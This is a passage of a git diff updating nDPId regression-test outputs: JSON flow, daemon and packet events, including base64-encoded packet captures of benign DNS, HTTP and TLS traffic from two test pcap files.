IP"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604822444474,"flow_last_seen":1604822444595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":268,"flow_first_seen":1604822444486,"flow_last_seen":1604822448523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":17062,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":785,"flow_first_seen":1604822444913,"flow_last_seen":1604822448604,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":480607,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447227,"flow_last_seen":1604822447785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447249,"flow_last_seen":1604822447807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 
00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","packets-captured":1185,"packets-processed":1185,"total-skipped-flows":0,"total-l4-data-len":523130,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":7,"total-detection-updates":7,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":58,"global_ts_msec":1604822448604} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1185/1185 diff --git a/test/results/ocs.pcap.out b/test/results/ocs.pcap.out index 0f785e40f..8a6b2b90e 100644 --- a/test/results/ocs.pcap.out +++ b/test/results/ocs.pcap.out 
@@ -1,1910 +1,123 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ocs.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ocs.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1449652784341} -00169{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":1,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652784341} -00328{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPKbzQABABiV4wKi0AkDpuLy6UxRsAv3YCQAAAACgAjkIdPYAAAIEBbQEAggKADWBtgAAAAABAwMG"} -00169{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":2,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786071} 
-00332{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":63,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":63,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAP4JiQABAETORwKi0AggICAiWSAA1ACtxaqbPAQAAAQAAAAAAAAVvY3UwMwhsYWJnZW5jeQJ3cwAAAQAB"} -00169{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":3,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786098} -00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":70,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":70,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAARoJmQABAETOGwKi0AggICAicoQA1ADK8OQlbAQAAAQAAAAAAAAhzZXR0aW5ncwtjcmFzaGx5dGljcwNjb20AAAEAAQ=="} -00169{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":4,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786130} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQ4JpQABAETOGwKi0AggICAgFCwA1AC+TFZykAQAAAQAAAAAAAANhcGkEZXUwMQhjYXBwdGFpbgNjb20AAAEAAQ=="} -00169{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":5,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786135} -00328{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPJwfQABABqbCwKi0ArL40Da8egBQwI4edgAAAACgAjkI+LAAAAIEBbQEAggKADWCaQAAAAABAwMG"} -00169{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":6,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786152} -00328{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPCFLQABABqbpwKi0AhcV5seZXwG7KAKjIAAAAACgAjkIs5MAAAIEBbQEAggKADWCawAAAAABAwMG"} -00169{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":7,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786167} -00328{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPOubQABABs8fwKi0AomHgc7QbABQfGRp9gAAAACgAjkIVT4AAAIEBbQEAggKADWCbQAAAAABAwMG"} -00169{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":8,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786190} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANJwgQABABqbJwKi0ArL40Da8egBQwI4ed\/tL3mKAEADlQqoAAAEBCAoANYJvRwX8Kg=="} -00169{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":9,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786215} 
-01352{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":824,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":824,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQADOJwhQABABqPEwKi0ArL40Da8egBQwI4ed\/tL3mKAGADlWgkAAAEBCAoANYJxRwX8KlBPU1QgL2NhdGFsb2cvdm9kP3Y9MyBIVFRQLzEuMQ0KWC1MZ3ktSHNzLUE6IEZGRTg2OUEyLTMzQUQtQTU0QS1CRUMwLTcyMTBEMDNDODM1Qi0yNTk0RDYzRA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpYLUxneS1IU1MtU2VydmljZS1JZDogb2ZyLm9jcw0KWC1MZ3ktSFNTLVJvbS1JZDogc2Ftc3VuZy9HVC1QNzUxMC9BbmRyb2lkLzQuMC40L1hXTFA2L2FybXY3bF8xMDAwLjBNSHpfMTk5OC44NEJvZ29NaXBzX2ZlYXR1cmVzKHN3cCxoYWxmLHRodW1iLGZhc3RtdWx0LHZmcCxlZHNwLHZmcHYzLHZmcHYzZDE2LHRscylfY29yZXM9Mi8xMjgweDc1Mi9mYWxzZQ0KQ29udGVudC1MZW5ndGg6IDIzNA0KSG9zdDogb2N1MDMubGFiZ2VuY3kud3MNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjAuNDsgZnItZnI7IEdULVA3NTEwIEJ1aWxkL0lNTTc2RCkgQXBwbGVXZWJLaXQvNTM0LjMwIChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgU2FmYXJpLzUzNC4zMA0KDQo8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJVVEYtOCI\/Pgo8bGd5cmVxdWVzdCBtb2R1bGU9IkNNL1ZPRCI+Cgk8YWN0aW9uIG5hbWU9ImluaXQiPgoJCTxwYXJhbSBuYW1lPSJzY3JlZW5TaXplIiB2YWx1ZT0iIi8+CgkJPHBhcmFtIG5hbWU9InRpbWVzdGFtcCIgdmFsdWU9IjAiLz4KCQk8cGFyYW0gbmFtZT0iYXBwLXZlcnNpb24iIHZhbHVlPSIxLjQuNyIvPgoJPC9hY3Rpb24+CjwvbGd5cmVxdWVzdD4="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":10,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786268} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANOucQABABs8mwKi0AomHgc7QbABQfGRp97oFwGaAEADlOEAAAAEBCAoANYJ3vXlL7A=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":11,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786271} -00535{"packet_event_id":1,"packet_event_name":"packet","packet_id":11,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":211,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":211,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAA0+udQABABs6GwKi0AomHgc7QbABQfGRp97oFwGaAGADl3TMAAAEBCAoANYJ3vXlL7EdFVCAveG1wcC1kaXNjbz9kZXZpY2VpZD1mMmM5OTNkNjIxOGY1ZTIyZmUyODRiMmU5MGM4MmYzYiZwdXNoX29uX2RldmljZT10cnVlJmFwcGlkPW9jczAwMDAwMyBIVFRQLzEuMQ0KSG9zdDogYXBpLmV1MDEuY2FwcHRhaW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":12,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786326} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANOueQABABs8kwKi0AomHgc7QbABQfGRqlroFwe2AEAD1NewAAAEBCAoANYJ9vXlMBA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":13,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786328} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":13,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANOufQABABs8jwKi0AomHgc7QbABQfGRqlroFwe2AEQD1NesAAAEBCAoANYJ9vXlMBA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":14,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786395} 
-00330{"packet_event_id":1,"packet_event_name":"packet","packet_id":14,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPGAaQABABlqhwKi0AomHgc6vnwBQfAzimQAAAACgAjkI\/akAAAIEBbQEAggKADWCgwAAAAABAwMG"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":15,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786398} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":15,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANOugQABABs8iwKi0AomHgc7QbABQfGRql7oFwe6AEAD1NdYAAAEBCAoANYKEvXlMEQ=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":16,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786451} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":16,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANJwiQABABqbHwKi0ArL40Da8egBQwI4he\/tL486AEAESObkAAAEBCAoANYKJRwX8ZA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":17,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786452} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":17,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANJwjQABABqbGwKi0ArL40Da8egBQwI4he\/tL5zyAEAE9NiAAAAEBCAoANYKJRwX8ZA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":18,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786500} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":18,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANGAbQABABlqowKi0AomHgc6vnwBQfAzimh3f\/xqAEADlPeYAAAEBCAoANYKOvXlMIw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":19,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786501} -00436{"packet_event_id":1,"packet_event_name":"packet","packet_id":19,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":136,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":136,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAiGAcQABABlpTwKi0AomHgc6vnwBQfAzimh3f\/xqAGADlKR0AAAEBCAoANYKOvXlMI0dFVCAvaXAtdG8tY291bnRyeSBIVFRQLzEuMQ0KSG9zdDogYXBpLmV1MDEuY2FwcHRhaW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":20,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786934} -00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":20,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASIK5QABAETMxwKi0AggICAi+ggA1ADS3+1EXAQAAAQAAAAAAAAdhbmRyb2lkB2NsaWVudHMGZ29vZ2xlA2NvbQAAAQAB"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":21,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652786975} 
-00436{"packet_event_id":1,"packet_event_name":"packet","packet_id":21,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":136,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":136,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAiGAdQABABlpSwKi0AomHgc6vnwBQfAzimh3f\/xqAGADlKO0AAAEBCAoANYK+vXlMI0dFVCAvaXAtdG8tY291bnRyeSBIVFRQLzEuMQ0KSG9zdDogYXBpLmV1MDEuY2FwcHRhaW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":22,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787003} -00329{"packet_event_id":1,"packet_event_name":"packet","packet_id":22,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPLBhQABABm1GwKi0Atg60C6hBwG7mRQyoQAAAACgAjkIAHcAAAIEBbQEAggKADWCwAAAAAABAwMG"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":23,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787075} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":23,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANLBiQABABm1NwKi0Atg60C6hBwG7mRQyouLMvMiAEADlCc8AAAEBCAoANYLHGASl5Q=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":24,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787100} 
-00568{"packet_event_id":1,"packet_event_name":"packet","packet_id":24,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":236,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":236,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAA7LBjQABABmyUwKi0Atg60C6hBwG7mRQyouLMvMiAGADlzvUAAAEBCAoANYLKGASl5RYDAQCzAQAArwMBVmhd8vjfjZbbQQM2P+6kSvFiVrQbP+1p3IwwDXzkWPQAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAQAALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":25,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787155} -00329{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPCFMQABABqbowKi0AhcV5seZXwG7KAKjIAAAAACgAjkIsy4AAAIEBbQEAggKADWC0AAAAAABAwMG"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":26,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787196} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":26,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQLBkQABABm0\/wKi0Atg60C6hBwG7mRQzWuLMvMiwEADlgxwAAAEBCAoANYLTGASmTQEBBQrizMI04szHoA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":27,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787196} 
-00337{"packet_event_id":1,"packet_event_name":"packet","packet_id":27,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQLBlQABABm0+wKi0Atg60C6hBwG7mRQzWuLMvMiwEADlffQAAAEBCAoANYLTGASmTQEBBQrizMI04szMyA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":28,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787198} -00337{"packet_event_id":1,"packet_event_name":"packet","packet_id":28,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQLBmQABABm09wKi0Atg60C6hBwG7mRQzWuLMvMiwEADlfQgAAAEBCAoANYLTGASmTQEBBQrizMI04szNtA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":29,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787263} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":29,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANLBnQABABm1IwKi0Atg60C6hBwG7mRQzWuLMzbSAEAES9ywAAAEBCAoANYLaGASmow=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":30,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787273} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":30,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFNQABABqbvwKi0AhcV5seZXwG7KAKjIVpZIEyAEADl\/h4AAAEBCAoANYLbl2cJ1g=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":31,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787289} -00617{"packet_event_id":1,"packet_event_name":"packet","packet_id":31,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":273,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":273,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQABESFOQABABqYRwKi0AhcV5seZXwG7KAKjIVpZIEyAGADlY\/8AAAEBCAoANYLdl2cJ1hYDAQDYAQAA1AMBVmhd8h0B5s6XDqG2jAg9OuLJnsmZQXwY4InZKY+7bC8AAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAZQAAAB0AGwAAGHNldHRpbmdzLmNyYXNobHl0aWNzLmNvbQALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABkAIwAA"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":32,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787367} -00501{"packet_event_id":1,"packet_event_name":"packet","packet_id":32,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":186,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":186,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAurBoQABABmzBwKi0Atg60C6hBwG7mRQzWuLMzbSAGAES+5wAAAEBCAoANYLkGASmoxYDAQBGEAAAQkEEtWAMNyT8WKHJF1e4GiSzdqCN0TSkLYwOtSesvtnBVhYkRBeZO\/K8p4LN8s8Jty9T7ZTt1ySHOehqYl4AHTgJxhQDAQABARYDAQAwJqEJMKdFZ9Mms8ZGzC\/cweCNMfBdi4uNKuK5rwKcBTRo9TtFzZzevE7tcMv7cs5J"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":33,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652787439} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":33,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFPQABABqbtwKi0AhcV5seZXwG7KAKj\/lpZJECAEAEE+OkAAAEBCAoANYLsl2cKCg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink 
